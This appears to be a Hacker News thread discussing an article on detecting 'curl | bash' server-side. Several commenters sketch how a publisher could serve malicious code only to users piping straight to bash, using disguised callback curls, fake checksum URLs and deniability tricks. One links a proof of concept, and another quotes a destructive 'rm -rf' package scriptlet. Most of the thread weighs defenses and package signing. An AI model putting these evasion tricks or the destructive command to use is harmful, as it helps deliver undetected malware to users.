Hacker News new | comments | ask | show | jobs | submit login
Detecting the use of "curl | bash" server-side (idontplaydarts.com)
500 points by rubyn00bie 6 months ago | hide | past | web | favorite | 145 comments



The sleep cleverness is excessive though - what you really want to know is if the script you're returning is being executed as it's sent. If it is, then you can be pretty confident that a human isn't reading it line by line.

1. Send your response as transfer-encoding: chunked and tcp_nodelay

2. Send the first command as

    curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.

For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.


You could even get more clever with this you could drop the unique_id and just match up the remote host IP. You could probably even disguise the command as something like a "network connectivity test" in the script.

    # Check network connectivity so we can continue the install
    if ! curl --fail www.example.com; then exit; fi
Of course, what actually is happening is that we've just informed the server to now serve our malicious code.


Remote host IP isn't ideal because of NAT (request from another host on the network exposes your malfeasance), or if your target may be using something like TOR (two requests might have differing remote IPs). But there's a bunch of tricks to get unique info out of a network request that you control the parameters to. Presumably there aren't that many concurrent invocations of your script, so only a few bits of entropy are actually required. Best way is probably to have a bunch of domains and make it look like they're various mirrors you're downloading binaries from - then it's not suspicious that it changes for different machines or requests.


If binaries are being downloaded, then the dynamically generated malicious script could pretend it's a checksum when really it's a unique tracking URL.

    curl www.example.com/downloads/fooprogram/builds/D41D8CD98F00B204E9800998ECF8427E.tgz
If the time between the script being downloaded and that file being requested is large, serve the clean copy, else download the malicious binary.


Well it's okay to not infect every target. In fact, if you are being malicious, it would be better to only infect some targets so as to muddy the waters when someone is trying to investigate your actions after the fact.

You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.


That's mistaken because:

  bash -c "`echo echo hi`"
note that `echo echo hi` is fully read, and then (and only then) passed to bash.

ditto for

  echo -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.

It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.


Which part is mistaken?

You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.


Sorry, 2AM. You're right of course.

I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.


Or perhaps people shouldn't curl | bash? I don't want curl to buffer all output, I use it on devices with little RAM and do stream processing.


I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.

I.e., curl is a *nix tool.


> Maybe a new tool that downloads and then runs a script from the interwebs needs to be written

What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.


Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap that program I just installed with pip isn't working because I'd already installed a version with apt and some of it's configuration isn't compatible!!!

It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.

[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.


Isn't that tool what we call a "user"?

jchook 6 months ago [flagged]

Sick burn.


Hm. I tried and it does not seem to work. You can view my attempt at https://github.com/sethgrid/exploit. Chances are that I am ignorant of something. If someone knows what am doing wrong, please let me know!

The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.

What I see happening is the downloaded script does not fully run until fully downloaded.


Help from /r/golang: I needed to still fill the TCP buffer!


This would reveal your intent to a human reader. I think the author of the article was trying to avoid doing that.


Fooling a human with bash is less difficult than you might imagine. I am fooled by bash code at least half the time I interact with a shell script I didn't write myself. A misleading comment plus an innocuous looking URL, coupled with the fact that an installation script can be expected to download files from the internet in order to install them would make this slip past nearly any reviewer.


You could encode something in the url using homographs.


On the evading detection side, one other simple way to avoid this is to add sponge[0] between curl and bash in the pipeline, i.e. curl ... | sponge | bash. sponge consumes all input until EOF before outputting anything, stopping bash from executing a partially downloaded script.

[0] https://linux.die.net/man/1/sponge


Just curl it to tee or redirect to a file and you know it won't change before you execute the script file.

There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.


If you're on a Mac or a system that doesn't have sponge installed by default, use moreutils to install.

https://joeyh.name/code/moreutils/ https://rentes.github.io/unix/utilities/2015/07/27/moreutils...


Thanks, this is helpful!


So yes, curl bash can be dangerous. But it's just so darn convenient. And when it's coming from a very prominent trusted source like for Get Pip or Amazon AWS it's hard not to just go with.

Surely there's some compromise middle ground? Let me download "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner? Maybe the checksum matches from a crowdsourced database.

"Sorry only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script and we will ask you if it looks valid or not or don't know."

I also think it's a bit more realistic than the, "anyone who does this should be reading the script first to check that it's safe." Yes, and I check the passenger jet for flaws before I board, too!

Just spitballing.


> Yes, and I check the passenger jet for flaws before I board, too!

There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.


If you're installing software off some random website then you're already hosed no matter what the install process looks like.

Say you already trust the website you're downloading from, is there an increased security risk doing curl | bash as compared to rpm --import https://example.com/RPM-GPG-EXAMPLE && yum install https://example.com/example.rpm

No matter what you're putting 100% faith in the the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.


Security is one of them.

When RPM-GPG-EXAMPLE and example.rpm are both coming from https://example.com it's less clear. When example.com is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the signatures in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection as being built by example.com.

From that example, we can see that package signing also protects from someone who's able to break into the main example.com webserver but not example.com's build system - if the attackers did not get into the build system and example.rpm has a valid signature then despite the webserver being broken, the rpm file can still be trusted, assuming the webserver did not have a copy of the private key used for build signing. If we loaded https://example.com/RPM-GPG-EXAMPLE before the webserver was broken into, and then the webserver was broken into and a malicious RPM-GPG-EXAMPLE and example.rpm were uploaded, it would be noticed. (Examining changes to RPM-GPG-EXAMPLE are, unfortunately, left to the reader as an exercise.)

Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, but there are methods available to confirm that the file's contents are valid, that don't rely on TLS, if the security folk at example.com are doing their job.

Finally, TLS is not an all or nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted, and in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (eg crt.sh) is a proper lever when working with example.com.

Security is complicated and there are no silver bullets.

`curl | sudo bash` is batshit though.


Say I already trust packages.redhat.com and install rpms regularly from it. I likely already have trusted their key.

Now packages.redhat.com gets hacked - if hacker also stole private key used for signing packages and replaced the RPMs. I will get warning/error while installing rpms (which I admit most users will ignore) but a curl|bash kinda defeats the point of package signing too.


Yes that's fair. My point is that most people using these scripts have nowhere near the expertise to be able to evaluate their safety.


Who are these "most people". I've never seen curl | bash outside of developer circles. "Most" people install things directly from the app store, or use web apps.


Good use case for IPFS. You could curl a hash and check that hash against signatures commited to a blockchain. If the set of signatures exist that you trust, then it's golden, if not, no exec.


If by "signatures committed to blockchain" you mean git with a GPG signed tip/tag, then yes, sure, blockchain.

If you mean that other thing, no.


The only difference is the consensus algorithm. A git repo is proof of authority, or proof of access rights.


> when it's coming from a very prominent trusted source like for Get Pip or Amazon AWS

Not a random website, and they do have an infrastructure.


> when it's coming from a very prominent trusted source like...Amazon AWS.

Be very careful here. https://installation.s3.amazonaws.com/setup.sh looks like a legit URL, but it's just some guy with an S3 bucket named "installation".


Security and convenience are almost always a difficult tradeoff. In the case of curl'ing scripts from trusted websites, what is the benefit for the average lazy user? Are you using an OS that doesn't have a signed package with the same library/program?

It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.


"Lazy" isn't a bad thing. When I see a curl-bash command from a reputable site, I'm not about to waste my time evaluating it. Consider step one to three from this site https://docs.aws.amazon.com/AmazonECS/latest/developerguide/... or get-pip instructions from this one: https://packaging.python.org/tutorials/installing-packages/

But I agree with your sentiment. If the exact same step was to `apt install ecs-cli` I would just do that and not feel any inconvenience about it.


Your solution depends on third parties checking the script or going based on some knowledge of "trusted sources." That has nothing to do with this hack, which exploits those who are "verifying" the script themselves before executing it.

The simple solution here is not to use curl/execute with a pipe. Just wget to save the file and check it locally (rather than through a browser) before executing.


Preventing the bad guy from "validating" his own script a million times is difficult. At the end of the day, I think security basically has to come from "I trust the website that I'm on."


I think the arch user repo does this correctly by asking, "do you want to edit the packagebuild?" You can just press n to accept defaults, or y to take a look under the hood and make edits before continuing.


Neat! But it's not obviously a bad idea. You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.


> You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.

This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).


I mean, I guess I see them making a three-stage argument:

1) Distributing software via bash script is a bad idea

2) Sensible people review the bash scripts they downloaded before running them

3) But haha! Here is a clever trick that evades that review.

And I'm not persuaded by 3) being interesting because I already rejected 1) and 2), and I consider 3) to just be proving my point -- you (for all you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at, and the actual reasoning to apply when deciding to install software this or any way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?".


I agree with im3w1l's point: if everyone runs the same install script, it's a lot riskier for the publisher to attack everywhere. If people run individualized scripts, it's a lot less risky.

I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.

I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but other users.

Instead of your (1) and (2) above, how about this?

1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.

2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.

3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.

Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like

curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software

I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.


I agree that the distributor having control over offering different artifacts to different individuals is very risky.

I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.

So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.

> you'll have a saved copy of the key afterward

Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?


> So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.

I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)


> This is particularly so when someone may be able to compromise the software publisher's infrastructure

Indeed. While this particular venue wouldn't have worked for:

https://wiki.gentoo.org/wiki/Project:Infrastructure/Incident...

(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian to suffer from compromise. But as they just push signed debs, the damage would be limited (not trivial, there could conceivably be bugs in apt/dpkg/gnupg etc).


If you are running the same script as everyone else, then then there is a good chance someone else will notice if something is off. If everyone is potentially given their own personalized script then this safety in numbers strategy doesn't work.

If you know you are running the standard scripts that everyone runs, then it also makes a post-breach investigation more easy. You know the exact scripts you ran as opposed to knowing "well I curl | bashed from these sites so one of them might be bad".


There's nothing stopping people from being served different content with packages. Hell, n users could receive n different packages which all pass the GPG check. And since you're getting your checksum from the same site it would look like it had the right checksum too. You would have to find other people you trust to compare it to but since everything appears to be above board why would you even think to do that?

Either you trust the entity you're downloading software from or you don't.


Linux/BSD distribution mirrors don't control the package signing keys, maintainers do. Similarly, Google doesn't possess the ability to push out updates for third-party apps, without fundamentally redesigning the OS with a platform update, because the signing keys are owned by the app developers, and the existing OS rejects updates signed with different keys. In both of these situations, the key owners lack the ability to selectively push out signed updates, unless they also control the distribution infrastructure.


The argument is predicated in the assumption that some subset of people are checking the installer before running it, whether that installer be a shell script or a binary package.

With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.

The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.

Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.


>in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact)

What do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).


Then that wouldn't be 'curl | bash'.


curl | ... bash


The point of the article is apparently that the server can distinguish "curl | ... | bash" from "curl | bash".


Alice and Bob are both installing something on their computers. It is available as both a .deb and via "curl | bash". It is not malicious...but it does turn out to have a serious bug.

They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.

Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.

Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.

Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.


Or Bob just curls the file again and reads it?


How does Bob curl the file again without network access? :-)

Remember, I said that the bug in the file broke the network configuration so that Alice and Bob lost all network access.


From another computer? This situation sounds so contrived as-is. Don't tell me they also can't use another system?


The difference is that you can inspect it before you run it if you download it. If you pipe it into bash you don’t know what you’re getting, even if you previously inspected the data provided by that URL.


I don't feel the need to review the source code for every install script I run.

I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I review it. Most install scripts and up doing "hit website, install thing" anyways - am I reviewing the second stage install script also?


That’s fair. It’s probably not an important difference.


That's a way in which "curl | bash" distributed software is better than .deb/.dmg distributed software, right? Because you have the potential to inspect the script first, if you have some kind of ridiculous confidence in your ability to perform security review of an entire software product in the moments before you decide to install it.

But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.


It doesn't take ridiculous confidence to analyze shell scripts. In the hundreds of scripts I have read, few were more than 100 lines long. It shouldn't take more than 60 seconds (probably 30 or less) to mentally build a list of all possible operations a short script can perform. Bourne shell scripts don't have much room to hide surprising behavior, and when they do, it immediately stands out. If they are permanently installed, and invoked later by other parts of the system, then they may need more probing, but we're talking about installation scripts.

.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)

Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.


If inspecting a script is a good way to avoid evil software, bugs would not exist.


deb/rpm is better because it's usually signed by maintainer with GPG keys. I think that it's harder to steal keys from maintainer than to infiltrate web server.


We came up with a way to do gpg verified curl | bash for ZeroTier. It still works without gpg too. Scroll down to Linux.

https://zerotier.com/download.shtml


Quote(trying to fit it to narrow widt, for others on mobile):

  curl -s \
  'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61'
  | gpg --import \
  && if z=$(curl -s 'https://install.zerotier.com/' | gpg);
  then echo "$z"
  | sudo bash;
  fi
It's interesting - it tries to import a given gpg key from keyserver, then grabs a gpg armored text file with a bash header - with the gpg header wrapped in a here-document:

  #!/bin/bash
  <<ENDOFSIGSTART=
  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA256

  ENDOFSIGSTART=
  
I'm unsure, but I think you could just stick your malicious code before the signature?

  #!/bin/bash
  sudo much_evil
  <<ENDOFSIGSTART=
  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA256

  ENDOFSIGSTART=
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and need copy-pasting - as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering js depending on visitor).


Putting malicious code before the signature doesn't work because gpg chops it out. It only outputs the verified part.

It is definitely a kludge though.


So the shebang is redundant, except for testing during development? [ed: and for allowing the daring to just do curl|bash, I guess]


It's not strictly necessary, no.


They could be. dpkg and rpm will still install unsigned packages by default. That's one problem.

Another problem is that people are being trained to get software [directly] from software developers.


For the most part you receive the GPG keys over the same TLS connection, though.


Not sure what you mean. I don’t think apt-get install foo involves transferring GPG keys.


We're comparing the security properties of

`curl https://somesite.com/foo.sh | bash`

with

`curl https://somesite.com/foo.deb`

and

`curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software`

I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.


No, you're deliberately choosing a bad way to get a key to try to prove your point. You shouldn't be fetching a key from the site that might be compromised.


> You shouldn't be fetching a key from the site that might be compromised.

You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.

To you it's obvious that packages aren't more secure, it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.

https://pydio.com/en/docs/v8/ed-debianubuntu-systems

https://docs.docker.com/install/linux/docker-ce/ubuntu/#inst...

https://www.spotify.com/uk/download/linux/

https://www.elastic.co/guide/en/apm/server/current/setup-rep...

https://ring.cx/en/download/gnu-linux

http://docs.grafana.org/installation/debian/

https://support.plex.tv/articles/235974187-enable-repository...

https://stack-of-tasks.github.io/pinocchio/download.html

http://download.mantidproject.org/ubuntu.html

https://docs.microsoft.com/en-us/cli/azure/install-azure-cli... (!!!)


I've always said the same, but what's the solution here?


There's three that I can see:

1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.

2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.

3. Smarter users. Good luck with that one.


No, there's no effective difference between those examples, apart from maybe post mortem analysis. It's also a poor method of key discovery, as hueving said.


GPG's trust model is outside the transport layer, via signatures.

Not foolproof, but it answers your objection.


That's an antipattern, should use keyservers.


Where do you get the keyserver ID? From the website? You're back to square one, because anyone can upload anything to a keyserver. If they can modify the website (change files, etc) they can also change the keyserver ID they're telling people to use.

The "antipattern" is letting/expecting software developers also be software publishers.


This is a good point, which should be brought up more. Although you probably meant key id or key fingerprint, not keyserver ID, which would imply something else.

You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.

It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:

    kernel.org: ABAF11C65A2970B130ABE3C479BE3E4300411886 Linus Torvalds <torvalds@kernel.org>
    marc.info:  647F28654894E3BD457199BE38DBBDC86092693E Greg Kroah-Hartman <gregkh@kernel.org>
    thunk.org:  3AB057B7E78D945C8C5591FBD36F769BC11804F0 Theodore Ts'o <tytso@mit.edu>
All keys are cross signed as shown by gpg2 --list-signatures.

If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.

Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.


Public keyservers are well-known, and in a different security domain than the download server. Without breaking in, a rogue party can't delete or replace keys from the keyservers.


Aren't keyserver lookups usually keyed off a 32-bit key ID though? (Whose space isn't big enough to avoid someone brute-force generating a key with a certain key ID s.t. you think you got the right key.) You're supposed to check the fingerprint, but you need to get the fingerprint, and for that you need a secure channel, and you're right back to square one.

For that matter, where did you get the key ID.


Still not safe.

Verify key signatures.

And I really wish GPG had a negative trust signature.


Yeah, if there are signatures then it doesn't matter. But often both are a miss.

Eg the key from https://docs.docker.com/install/linux/docker-ce/ubuntu/#set-... doesn't have signatures, and isn't on the keyservers.

Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists. And you can keep the initially downloaded key in your CI configs.


Verify it against what?


See what keys have signed a given key. See Debian maintainer keys as an example.

This is ... not everything that it could be, and is approaching 30 years old, technology built for a vastly different world.

But this is the basis of the GPG / PGP Web of Trust.

https://en.wikipedia.org/wiki/Web_of_trust

http://www.pgpi.org/doc/pgpintro/

http://www.rubin.ch/pgp/weboftrust.en.html

(I've addressed this point ... a distressing number of times on HN: https://hn.algolia.com/?query=dredmorbius%20web%20of%20trust... 0


Have you contacted maintainers if they're willing to do this? Is there a way to configure apt to verify chain of trust?


Downloading a .dmg is not running any code, which makes it 100% better at preventing malware installation than curl | bash.


dpkg/packages have sanity checks to make sure that files aren't being overwritten, and things are generally in a sane state.

curl|bash involves no checks, and no system integration whatsoever.


dpkg doesn't stop you overwriting system files in a post-install shell script, as far as I know? Which is the way that a malicious package would choose to do it. I don't think dpkg performs any meaningful security review in the way you describe.


Would you like me to craft you a .deb/.rpm which totally trashes your system? Packages can and very often do leverage the ability to run arbitrary scripts but nothing says I can't do serious damage even without that.


%post

rm -rf —no-preserve-root / 2>&1 > /dev/null

Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp —scripts package.rpm, isn’t this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?

Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.


Obviously its possible, but if somebody is being malicious all bets are off.

deb is still a more structured format that is less likely to result in accidental collateral damage.


You could just have the script detect that its stdin is a pipe. E.g., Linux specific:

  $ echo 'ls -l /proc/$$/fd/0' | bash
  lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd0 to be a pipe.

We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.

This is superior to the dodgy, delay-based server side detection because it is reliable.

Also, it still works when someone does this:

  $ curl <url> > file
  $ cat file | bash
Of course, no protection for

  $ bash file


This logic would be detectable to a user who reads the script. The goal here is to trick users who first inspect the script and then `curl | bash`


If you downloaded the script to inspect it, why would you not just run the script that you downloaded?


That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.


    curl evil.com
    curl evil.com | bash


    wget evil.com
    less evil.sh
    bash evil.sh


There's more than one user. You don't want any of them to find the malicious code.


Web browser.


Half the problem with `curl | bash` installation is not related to whether or not you trust what your downloading...

The more important reason why it is a _horrible_ _stupid_ mechanism for software installation is that it is not _repeatable_.

It is well understood that casual .deb .rpm usage requires an equivalent level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_ _repeatable_ and _mirrorable_... I can copy the entire repository of any version of debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.


Plenty of those scripts simply detect your operating system and then interact with the system package manager (adding a new repository, updating the package index, then asking the package manager to install it).


I would far prefer that software projects assumed competence in the installers knowledge of their systems package manager and just listed the specifics... honestly how hard is it to just say "here is our $gpg key" "here is our $apt_repo_url" the package name is "$foobar". And let competent system admins take it from there. Most of the time you end up de-composing the scripts into ansible/$sys_automation_tool_of_the_week anyhow.


Because your $apt_repo_url is useless to a yum user.

The package management community needs to stop balkanizing.

How else do you propose releasing software to all Unix-like OSes without learning a half dozen package manager formats and quirks? Only other choice is a container.


I wish there was a standard way to check a checksum, so that download instructions could just include that in the snippet to copy paste.

I wrote a tool that could be used like that but it's useless if its not ubiquitous (https://github.com/mmikulicic/runck)


I've got a similar python script in my collection of scripts:

    $ curl <url> | pipe-checksum <expected> | bash
https://gist.github.com/pcl/64bd2f56695fcf8e1fad51443aab1f1e


Since copy-pasting to the terminal is also unsafe[1], it's not really a solution...

At any rate - code-signing doesn't really help if the author is the attacker.

[1] http://thejh.net/misc/website-terminal-copy-paste


Sure, but that's harder to hide. Any user could paste somewhere where nothing gets executed and the expose the hack attempt. Pipe to bash has the interesting aspect of letting the author inject hacks only to people who are not looking.

Anyway, the use case for my runck utility is scripts such as dockefiles or CI automation where I want to download and run installers and I don't want to reduce the bash boilerplate.


I always read the code first, but many times there's additional curl > bash and if I check that url there are yet more curl > bash several layers deep with branches. And they want me to run this as root ...


Regardless of the installation method it sounds like we need to be running all applications in their own individual virtual machines (e.g. Qubes OS) or within a restricted environment with limited permissions (iOS)


How do you install the virtual machine software ? Where do you put the trust ?


Worse, what happens when I do want the applications to communicate?

An amusing gotcha I found with docker was how do I convince the servers I communicate with from in the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)


> I do want the applications to communicate?

QubeOS adopted the "manual authentication" method (of having to confirm everything, such as clipboard copy/paste).

This is probably not quite scalable (not to mention annoying). May be there's some way to have a short session token, so during a work session of a few hours, it works without any intervention.


The problem came when I wanted the app to communicate to another on behalf of me. Do I have to constantly reconfigure an openid connection for every app on my machine? (Not the worst of ideas, I suppose...)



This is immune to the attack:

    bash -c "$(curl -sSLf $URL)"
The key is to download first and then run


Or better yet:

curl $URL

less $FILE

bash $FILE

This attack only works at all if you download something and execute it immediately without looking at it.


Do you know if

  . <(curl -sL $url)
works (sourcing from a Process Substitution)?


The obsession against shell pipes is so absolutely absurd. You’d download a dmg and drag it to your apps but not shell pipe? You’ll sudo dpkg -i but not a shell pipe?

Can anyone point to a single case of a shell pipe ever being abused ever?


If a tree falls in a forest and no one is around to hear it, does it make a sound?

I certain that someone has been exploited using shell pipes.


I'd like to point out that the author is not directly discrediting shell pipes.

> a knowledgable user will most likely check the content first

The obvious workaround would be to download with curl, inspect, then run the virtually same inspected file through bash. This workflow is easier without necessarily using pipes. Package files can also be inspected before running and are not directly inspected in the browser.

Trust on the other hand is more complicated. Without doing tedious manual inspecting, you have to rely on the distributor. In this case, public keys aid in this regard, but also does not work with the `curl | bash` workflow.


Bash: execute an unsigned script to install an unsigned payload. Probably requires admin rights.

dmg: download an archive file which contains a signed payload which is copied to Apps. Admin rights are used for copying only.

The difference is blindingly obvious.


I have proposed a solution to this: have the snippet self-hashed and verify with multiple sources. eg:

A=$(curl -L https://get.rvm.io);echo "$A" | shasum -a 256 | grep -q 05b6b5f164d4df5aa593f9f925806fc1f48c4517daeeb5da66ee49e8562069e1 && (echo "$A")


The main reason to use `curl | bash` is because it's installed almost everywhere. Everything else can be bootstrapped from that.

If there was a standard `curlbash <URL> <SHA256>` program that was installed everywhere it would allow to work around all of these issues.


"curl > file ; [...] ; bash file" is also installed in all the same places.


What I leaned in addition to the sleep trick:

> Execution in bash is performed line by line and so the speed that bash can ingest data is limited by the speed of execution of the script.

So even without any clever detection logic, thinking of curl | bash as "downloading a script, then immediately executing it" is already wrong.

It's more "give this remote host a poor man's shell to my machine and hope that they will always execute the same sequence of commands on it".


Recent Chrome Canaries show ERR_CERT_SYMANTEC_LEGACY on this host. Gotta refresh those TSL certificates before September!


Let's say for discussion that we allow this curl| bash process because it is from a "safe" source.

How do we come back next week and ensure some other process hasn't changed the files ?

Package your files with a signed system. Auditing the files is trivial after that.


You could prevent the detection by wrapping contents in a block, so Bash reads it entirely before evaluating it: `safe_curl() { printf "{\n"; curl "$@"; printf " \n}"; }`


Quite a sensible precaution anyway, as network interruption may otherwise leave you with a partially executed script.


I use curl and bash to launch a script I wrote to install my versioned home files, and it is worth to use this method. It depends on what you need, in my use case is really comfortable. It is a matter of trust.


Erm, why not just configure auditd to detect it instead? Though not sure how widely available that facility is outside of Red Hat.


Shall we call this "Curl rebinding" after "DNS rebinding"? :)


Why not start with checking the user agent?


The idea is to distinguish between "curl http://x" and "curl http://x | bash", in order to only give malicious content when the user pipes it straight to bash (presumably they aren't looking at the content in this case).


Ah, of course.


Is there no way to sign scripts with a code signing certificate?

I certainly have to do some hoop jumping to execute the equivalent of curl |bash on powershell.


(Invoke-WebRequest https://example.com/install.ps1).Content | Invoke-Expression


How is that any different from using SSL? In both cases, someone you trust is giving you code to execute, unseen.


> a knowledgable user will most likely check the content first

Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?

